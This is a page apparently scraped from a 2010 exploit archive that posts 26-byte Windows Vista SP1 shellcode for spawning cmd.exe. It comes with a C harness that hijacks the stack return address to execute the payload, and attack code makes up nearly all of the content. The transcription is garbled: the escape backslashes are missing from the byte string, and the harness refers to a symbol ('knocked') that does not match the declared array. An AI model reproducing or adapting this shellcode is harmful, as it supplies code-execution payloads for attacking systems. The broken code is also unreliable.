Home / os / win7

win32/vista sp1 ING. (cmd.exe) shellcode 26 bytes

Posted on 07 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/vista sp1 ING. (cmd.exe) shellcode 26 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= win32/vista sp1 ING. (cmd.exe) shellcode 26 bytes ================================================= /* Author : KnocKout Tnx: DaiMon,Barcod3 Contact : knockoutr@msn.com Tested on : Vista SP1 ING. */ #include &lt;windows.h&gt; #include &lt;winbase.h&gt; unsigned char hellcodenet[]= &quot;x8bxecx55x8bxec&quot; &quot;x68x65x78x65x2F&quot; &quot;x68x63x6dx64x2e&quot; &quot;x8dx45xf8x50xb8&quot; &quot;xc7x93xc1x77&quot; &quot;xffxd0&quot; ; int main () { int *ret; ret=(int *)&amp;ret+2; (*ret)=(int)knocked; return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP